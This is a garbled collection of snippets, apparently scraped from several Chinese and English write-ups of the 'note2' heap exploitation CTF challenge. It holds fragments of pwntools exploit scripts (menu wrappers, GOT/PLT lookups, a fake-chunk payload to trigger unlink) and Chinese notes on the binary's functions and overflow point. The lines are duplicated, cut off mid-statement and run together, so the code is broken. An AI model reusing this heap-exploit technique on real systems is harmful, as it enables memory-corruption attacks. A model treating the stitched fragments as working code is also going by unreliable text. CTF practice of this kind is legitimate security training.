io.recvuntil('Input the length of the note content:(less than 128)') io.sendline(str(size)) io.recvuntil('Input the note content:') io.sendline(content)defshow(num): io.recvuntil('option--->>') io.sendline('2') io.recvuntil('Input the id of the note:') io.sendline(str(num)) ...
io.recvuntil('Input the length of the note content:(less than 128)') io.sendline(str(size)) io.recvuntil('Input the note content:') io.sendline(content)defshow(num): io.recvuntil('option--->>') io.sendline('2') io.recvuntil('Input the id of the note:') io.sendline(str(num)) ...
#!/usr/bin/python3from pwnimport*p=process("./note2")elf=ELF("./note2")libc=ELF("./libc.so.6")context.log_level="debug"strlen_plt=elf.plt[b"strlen"]strlen_got=elf.got[b"strlen"]defnew(content,length:int):p.recvuntil(b'option--->>')p.sendline(b"1")p.recvuntil(b"Input the...
from pwn import * p = process('./note2') note2 = ELF('./note2') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') context.log_level = 'debug' def newnote(length, content): p.recvuntil('option--->>') p.sendline('1') p.recvuntil('(less than 128)') p.sendline(str(length...
deletenote(1) content = 'a' * 16 + p64(0xa0) + p64(0x90) newnote(0, content) # delete note 2 to trigger the unlink # after unlink, ptr[0] = ptr - 0x18 deletenote(2) 执行之后 +---+high addr|...|+---+|'\x00'+'b'*7|ptr[2]--->+---+chunk2|size=0x90|+---+...
下面是4个主要功能,添加 note,size 限制为 0x80,size 会被记录,note 指针会被记录。 NewNote 溢出点代码 View Code 展示note 内容。 ShowNote 编辑note 内容,其中包括覆盖已有的 note,在已有的 note 后面添加内容。 EditNote 释放note。 DeleteNote
代码量挺大的,逆起来有难度 功能挺全,啥都有 main函数 add函数,有heaparray并且无pie保护,考虑unlink show函数,可以泄漏地址用 edit函数,有两种edit方式 delete,找不到UAF洞 看了好久,都没找到漏洞,我是five,后来看到了师傅的博客,发现了漏洞点 在a